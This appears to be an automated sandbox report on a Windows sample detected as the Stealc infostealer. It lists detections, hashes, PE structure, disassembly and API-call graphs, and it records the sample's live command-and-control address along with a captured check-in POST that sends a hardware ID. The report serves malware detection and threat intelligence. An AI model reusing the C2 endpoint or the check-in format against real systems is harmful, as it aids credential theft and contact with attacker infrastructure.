              Source: Yara matchFile source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1136, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe51%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpy~C4100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php47100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpp7100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpez100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpp718%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpp7file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206/c4becf79229cb002.phpzfile.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpy~C4file.exe, 00000000.00000002.1716207781.0000000001651000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/wsfile.exe, 00000000.00000002.1716207781.0000000001646000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.2065file.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpezfile.exe, 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://185.215.113.206/c4becf79229cb002.php47file.exe, 00000000.00000002.1716207781.000000000166C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1572096
                            Start date and time:2024-12-10 05:46:05 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 31s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 79%
                            • Number of executed functions: 15
                            • Number of non-executed functions: 128
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                            • 185.215.113.206

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949004805785211
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'772'032 bytes
                            MD5:c1950c4aafa568b63462b2131c67ceab
                            SHA1:e2aefdf02e7081c1b6bd03affd8d336642388854
                            SHA256:2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb
                            SHA512:24312a48d39d7142ea6b8d49f0c0a95a8661588697e3ec6fd45df5046c83df764549a4f46d0dd732676cbc92468a9c887a75c8681f9c1a9b29fface67df044a9
                            SSDEEP:24576:4M65D66hgGJglzXMwGyAvtUybnqeFC3pDdtmnRt+LDu0QRJmlVJYS2smPl4XwQ89:4f5FhgOgPpWTb1CF7mzKlgpS1AG7Q
                            TLSH:48853333FB669FBEE0612DF5E9202571F6EE52B49D5637ACA360184B3002763DA79C40
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L....dTg...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xa7e000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x67546419 [Sat Dec 7 15:04:57 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F3BACB3623Ah
                            psubsb mm3, qword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            inc ecx
                            push bx
                            dec esi
                            dec ebp
                            das
                            xor al, 36h
                            dec edi
                            bound ecx, dword ptr [ecx+4Ah]
                            dec edx
                            insd
                            push edi
                            dec eax
                            dec eax
                            jbe 00007F3BACB362A2h
                            push esi
                            dec edx
                            popad
                            je 00007F3BACB3629Bh
                            push edx
                            dec esi
                            jc 00007F3BACB362AAh
                            cmp byte ptr [ebx], dh
                            push edx
                            jns 00007F3BACB36277h
                            or eax, 49674B0Ah
                            cmp byte ptr [edi+43h], dl
                            jnc 00007F3BACB3627Dh
                            bound eax, dword ptr [ecx+30h]
                            pop edx
                            inc edi
                            push esp
                            push 43473163h
                            aaa
                            push edi
                            dec esi
                            xor ebp, dword ptr [ebx+59h]
                            push edi
                            push edx
                            pop eax
                            je 00007F3BACB36287h
                            xor dl, byte ptr [ebx+2Bh]
                            popad
                            jne 00007F3BACB3627Ch
                            dec eax
                            dec ebp
                            jo 00007F3BACB36273h
                            xor dword ptr [edi], esi
                            inc esp
                            dec edx
                            dec ebp
                            jns 00007F3BACB36280h
                            insd
                            jnc 00007F3BACB362A0h
                            aaa
                            inc esp
                            inc ecx
                            inc ebx
                            xor dl, byte ptr [ecx+4Bh]
                            inc edx
                            inc esp
                            bound esi, dword ptr [ebx]
                            or eax, 63656B0Ah
                            jno 00007F3BACB36288h
                            push edx
                            insb
                            js 00007F3BACB362A1h
                            outsb
                            inc ecx
                            jno 00007F3BACB36282h
                            push ebp
                            inc esi
                            pop edx
                            xor eax, dword ptr [ebx+36h]
                            push eax
                            aaa
                            imul edx, dword ptr [ebx+58h], 4Eh
                            aaa
                            inc ebx
                            jbe 00007F3BACB3627Ch
                            dec ebx
                            js 00007F3BACB36273h
                            jne 00007F3BACB36261h
                            push esp
                            inc bp
                            outsb
                            inc edx
                            popad
                            dec ebx
                            insd
                            dec ebp
                            inc edi
                            xor dword ptr [ecx+36h], esp
                            push 0000004Bh
                            sub eax, dword ptr [ebp+33h]
                            jp 00007F3BACB3628Ch
                            dec edx
                            xor bh, byte ptr [edx+56h]
                            bound eax, dword ptr [edi+66h]
                            jbe 00007F3BACB3626Ah
                            dec eax
                            or eax, 506C720Ah
                            aaa
                            xor dword ptr fs:[ebp+62h], ecx
                            arpl word ptr [esi], si
                            inc esp
                            jo 00007F3BACB362A3h

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x2490000x1680073f80b079d1e788654779108d827004eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x24a0000x1ac0x200e2d5d0d7d0d985448b9b06b65b10b0a8False0.583984375data4.552278876714865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x24c0000x29a0000x200c17f752a2760b6c07fd81243dacdd662unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            yyknqjng0x4e60000x1970000x196600fb6d4d4819bc9959535137b86d5cc4d6False0.9947840568286681data7.953203836513533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ncuennkv0x67d0000x10000x4009299835f9c277271f9ab627ee8495329False0.7783203125data6.0243597828577IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x67e0000x30000x2200b309e8d49b4bea93bfe9db7673f0b8f5False0.3957950367647059DOS executable (COM)4.152161401856862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x67c2d80x152ASCII text, with CRLF line terminators0.6479289940828402

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-10T05:46:59.672495+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 10, 2024 05:46:57.775144100 CET4973080192.168.2.4185.215.113.206
                            Dec 10, 2024 05:46:57.894607067 CET8049730185.215.113.206192.168.2.4
                            Dec 10, 2024 05:46:57.894707918 CET4973080192.168.2.4185.215.113.206
                            Dec 10, 2024 05:46:57.895006895 CET4973080192.168.2.4185.215.113.206
                            Dec 10, 2024 05:46:58.014250994 CET8049730185.215.113.206192.168.2.4
                            Dec 10, 2024 05:46:59.226012945 CET8049730185.215.113.206192.168.2.4
                            Dec 10, 2024 05:46:59.226144075 CET4973080192.168.2.4185.215.113.206
                            Dec 10, 2024 05:46:59.231276035 CET4973080192.168.2.4185.215.113.206
                            Dec 10, 2024 05:46:59.350541115 CET8049730185.215.113.206192.168.2.4
                            Dec 10, 2024 05:46:59.672362089 CET8049730185.215.113.206192.168.2.4
                            Dec 10, 2024 05:46:59.672494888 CET4973080192.168.2.4185.215.113.206
                            Dec 10, 2024 05:47:01.195583105 CET4973080192.168.2.4185.215.113.206

                            HTTP Request Dependency Graph

                            • 185.215.113.206

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730185.215.113.206801136C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Dec 10, 2024 05:46:57.895006895 CET90OUTGET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Dec 10, 2024 05:46:59.226012945 CET203INHTTP/1.1 200 OK
                            Date: Tue, 10 Dec 2024 04:46:59 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Dec 10, 2024 05:46:59.231276035 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI
                            Host: 185.215.113.206
                            Content-Length: 210
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 37 35 42 31 38 34 33 37 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a
                            Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"3E75B184375B340779059------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"stok------JKKFIIEBKEGIEBFIJKFI--
                            Dec 10, 2024 05:46:59.672362089 CET210INHTTP/1.1 200 OK
                            Date: Tue, 10 Dec 2024 04:46:59 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:23:46:53
                            Start date:09/12/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x590000
                            File size:1'772'032 bytes
                            MD5 hash:C1950C4AAFA568B63462B2131C67CEAB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:4.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:13.3%
                              Total number of Nodes:1398
                              Total number of Limit Nodes:24
                              execution_graph 30122 5ac559 ShellExecuteEx 30141 597650 free ctype 28673 5b1bd0 28718 5929a0 28673->28718 28677 5b1be3 28678 5b1c09 lstrcpy 28677->28678 28679 5b1c15 GetUserDefaultLangID 28677->28679 28678->28679 28680 5b1c28 28679->28680 28681 5b1c3e 28679->28681 28680->28681 28682 5b1c36 ExitProcess 28680->28682 28819 5b2a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 28681->28819 28684 5b1c6d lstrlen 28689 5b1c85 28684->28689 28685 5b1c43 28685->28684 29024 5b29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28685->29024 28687 5b1c57 28687->28684 28692 5b1c66 ExitProcess 28687->28692 28688 5b1ca9 lstrlen 28690 5b1cbf 28688->28690 28689->28688 28691 5b1c99 lstrcpy lstrcat 28689->28691 28693 5b1ce0 28690->28693 28694 5b1ccc lstrcpy lstrcat 28690->28694 28691->28688 28695 5b2a70 3 API calls 28693->28695 28694->28693 28696 5b1ce5 lstrlen 28695->28696 28697 5b1cfa 28696->28697 28698 5b1d20 lstrlen 28697->28698 28700 5b1d0d lstrcpy lstrcat 28697->28700 28699 5b1d36 28698->28699 28701 5b1d54 28699->28701 28702 5b1d40 lstrcpy lstrcat 28699->28702 28700->28698 28821 5b29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28701->28821 28702->28701 28704 5b1d59 lstrlen 28705 5b1d6d 28704->28705 28706 5b1d7d lstrcpy lstrcat 28705->28706 28707 5b1d90 28705->28707 28706->28707 28708 5b1dae lstrcpy 28707->28708 28709 5b1db6 28707->28709 28708->28709 28710 5b1ddc OpenEventA 28709->28710 28711 5b1dee 28710->28711 28712 5b1e14 CreateEventA 28710->28712 28713 5b1df0 CloseHandle Sleep OpenEventA 28711->28713 28822 5b1b00 GetSystemTime 28712->28822 28713->28712 28713->28713 28717 5b1e2d CloseHandle ExitProcess 29025 594980 28718->29025 28720 5929b1 28721 594980 2 API calls 28720->28721 28722 5929c7 28721->28722 28723 594980 2 API calls 28722->28723 28724 5929dd 28723->28724 28725 594980 2 API calls 28724->28725 28726 5929f3 28725->28726 28727 594980 2 API calls 28726->28727 28728 592a09 28727->28728 28729 594980 2 API calls 28728->28729 28730 592a1f 28729->28730 28731 594980 2 API calls 28730->28731 28732 592a38 28731->28732 28733 594980 2 API calls 28732->28733 28734 592a4e 28733->28734 28735 594980 2 API calls 28734->28735 28736 592a64 28735->28736 28737 594980 2 API calls 28736->28737 28738 592a7a 28737->28738 28739 594980 2 API calls 28738->28739 28740 592a90 28739->28740 28741 594980 2 API calls 28740->28741 28742 592aa6 28741->28742 28743 594980 2 API calls 28742->28743 28744 592abf 28743->28744 28745 594980 2 API calls 28744->28745 28746 592ad5 28745->28746 28747 594980 2 API calls 28746->28747 28748 592aeb 28747->28748 28749 594980 2 API calls 28748->28749 28750 592b01 28749->28750 28751 594980 2 API calls 28750->28751 28752 592b17 28751->28752 28753 594980 2 API calls 28752->28753 28754 592b2d 28753->28754 28755 594980 2 API calls 28754->28755 28756 592b46 28755->28756 28757 594980 2 API calls 28756->28757 28758 592b5c 28757->28758 28759 594980 2 API calls 28758->28759 28760 592b72 28759->28760 28761 594980 2 API calls 28760->28761 28762 592b88 28761->28762 28763 594980 2 API calls 28762->28763 28764 592b9e 28763->28764 28765 594980 2 API calls 28764->28765 28766 592bb4 28765->28766 28767 594980 2 API calls 28766->28767 28768 592bcd 28767->28768 28769 594980 2 API calls 28768->28769 28770 592be3 28769->28770 28771 594980 2 API calls 28770->28771 28772 592bf9 28771->28772 28773 594980 2 API calls 28772->28773 28774 592c0f 28773->28774 28775 594980 2 API calls 28774->28775 28776 592c25 28775->28776 28777 594980 2 API calls 28776->28777 28778 592c3b 28777->28778 28779 594980 2 API calls 28778->28779 28780 592c54 28779->28780 28781 594980 2 API calls 28780->28781 28782 592c6a 28781->28782 28783 594980 2 API calls 28782->28783 28784 592c80 28783->28784 28785 594980 2 API calls 28784->28785 28786 592c96 28785->28786 28787 594980 2 API calls 28786->28787 28788 592cac 28787->28788 28789 594980 2 API calls 28788->28789 28790 592cc2 28789->28790 28791 594980 2 API calls 28790->28791 28792 592cdb 28791->28792 28793 594980 2 API calls 28792->28793 28794 592cf1 28793->28794 28795 594980 2 API calls 28794->28795 28796 592d07 28795->28796 28797 594980 2 API calls 28796->28797 28798 592d1d 28797->28798 28799 594980 2 API calls 28798->28799 28800 592d33 28799->28800 28801 594980 2 API calls 28800->28801 28802 592d49 28801->28802 28803 594980 2 API calls 28802->28803 28804 592d62 28803->28804 28805 5b63c0 GetPEB 28804->28805 28806 5b65f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 28805->28806 28807 5b63f3 28805->28807 28808 5b6668 28806->28808 28809 5b6655 GetProcAddress 28806->28809 28816 5b6407 20 API calls 28807->28816 28810 5b669c 28808->28810 28811 5b6671 GetProcAddress GetProcAddress 28808->28811 28809->28808 28812 5b66b8 28810->28812 28813 5b66a5 GetProcAddress 28810->28813 28811->28810 28814 5b66c1 GetProcAddress 28812->28814 28815 5b66d4 28812->28815 28813->28812 28814->28815 28817 5b66dd GetProcAddress GetProcAddress 28815->28817 28818 5b6707 28815->28818 28816->28806 28817->28818 28818->28677 28820 5b2ac4 28819->28820 28820->28685 28821->28704 29030 5b1800 28822->29030 28824 5b1b61 sscanf 29069 592930 28824->29069 28827 5b1bc9 28830 5b01d0 28827->28830 28828 5b1bb6 28828->28827 28829 5b1bc2 ExitProcess 28828->28829 28831 5b01fa 28830->28831 28832 5b0229 lstrcpy 28831->28832 28833 5b0235 28831->28833 28832->28833 28834 5b024b lstrlen 28833->28834 28835 5b0268 28834->28835 28836 5b028b lstrlen 28835->28836 28837 5b027f lstrcpy 28835->28837 28838 5b02a8 28836->28838 28837->28836 28839 5b02cb lstrlen 28838->28839 28840 5b02bf lstrcpy 28838->28840 28841 5b02e8 28839->28841 28840->28839 28842 5b030b 28841->28842 28843 5b02ff lstrcpy 28841->28843 29071 5b1550 28842->29071 28843->28842 28846 5b0339 28847 5b035c lstrlen 28846->28847 28848 5b0350 lstrcpy 28846->28848 28849 5b0376 28847->28849 28848->28847 28850 5b0399 lstrlen 28849->28850 28851 5b038d lstrcpy 28849->28851 28852 5b03b0 28850->28852 